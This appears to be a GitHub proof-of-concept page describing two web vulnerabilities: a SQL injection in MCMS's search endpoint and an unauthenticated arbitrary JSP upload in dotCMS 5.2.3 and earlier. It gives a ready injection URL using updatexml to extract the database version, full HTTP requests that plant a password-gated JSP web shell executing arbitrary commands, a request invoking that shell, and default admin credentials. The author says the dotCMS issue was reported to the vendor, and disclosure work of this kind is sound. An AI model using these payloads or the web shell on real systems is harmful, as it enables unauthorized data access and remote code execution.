pd1r / poc Goto Github PK

There is a SQL inject Vulnerability, the path is "/ms-mcms/mcms/search"

Vulnerability file: src/main/java/net/mingsoft/cms/dao/IContentDao.xml

<where>
	a.app_id = #{websiteId}
	<if test="ids!=null and ids!=''">
		and FIND_IN_SET(content_category_id,'${ids}')
	</if>

：src/main/java/net/mingsoft/cms/action/web/MCmsAction.java

		List<DiyModelMap> fieldValueList = new ArrayList<DiyModelMap>(); // 栏目对应字段的值
		int typeId = 0;
		String categoryIds = BasicUtil.getString("categoryId");
		//当传递了栏目编号，但不是栏目集合
		if(!StringUtil.isBlank(categoryIds) && !categoryIds.contains(",")){
			typeId = Integer.parseInt(categoryIds);
		}

PoC:
Paste the url in Browser

http://192.168.0.106:8080/ms-mcms/mcms/search?categoryId=133333')or+updatexml(1,concat(0x7e,(SELECT+%40%40version),0x7e),1)%23

Front-page arbitrary file upload vulnerability in Dotcms <= 5.2.3

There is a file upload vulnerability which allows remote attackers to upload jsp file without auth.

Vulnerability PoC:

POST /api/v1/temp?maxFileLength=-1 HTTP/1.1
Host: 192.168.0.108:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------558889886168842024901999681
Content-Length: 604
Origin: http://192.168.0.108:8080
Connection: close
Referer: http://192.168.0.108:8080/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=sites&p_p_action=1&p_p_state=maximized&angularCurrentPortlet=sites&p_p_mode=view&_sites_struts_action=%2Fext%2Fcontentlet%2Fedit_contentlet&_sites_cmd=new&_sites_selectedStructure=855a2d72-f2f3-4169-8b04-ac5157c4380c&_sites_lang=1&referer=/c/portal/layout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3Dsites%26p_p_action%3D0%26p_p_state%3Dmaximized%26angularCurrentPortlet%3Dsites%26_sites_struts_action%3D/ext/hostadmin/view_hosts&in_frame=true&frame=detailFrame&container=true&angularCurrentPortlet=sites

-----------------------------558889886168842024901999681
Content-Disposition: form-data; name="files"; filename="023.jsp"
Content-Type: application/octet-stream

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];

        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }

    }
%>

-----------------------------558889886168842024901999681--

Usage ： just need modify the temp_67b53a839b，without auth !!!

GET /123123/../assets/tmp_upload/temp_67b53a839b/023.jsp?pwd=023&i=whoami HTTP/1.1
Host: 192.168.0.108:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://192.168.0.108:8080
Connection: close
Referer: http://192.168.0.108:8080/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=sites&p_p_action=1&p_p_state=maximized&angularCurrentPortlet=sites&p_p_mode=view&_sites_struts_action=%2Fext%2Fcontentlet%2Fedit_contentlet&_sites_cmd=new&_sites_selectedStructure=855a2d72-f2f3-4169-8b04-ac5157c4380c&_sites_lang=1&referer=/c/portal/layout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3Dsites%26p_p_action%3D0%26p_p_state%3Dmaximized%26angularCurrentPortlet%3Dsites%26_sites_struts_action%3D/ext/hostadmin/view_hosts&in_frame=true&frame=detailFrame&container=true&angularCurrentPortlet=sites
Content-Length: 2

Others :
http://127.0.0.1:8080/dotAdmin/#/public/login
[email protected] admin

I have submit this vul to dotcms.
dotCMS/core#17796 (comment)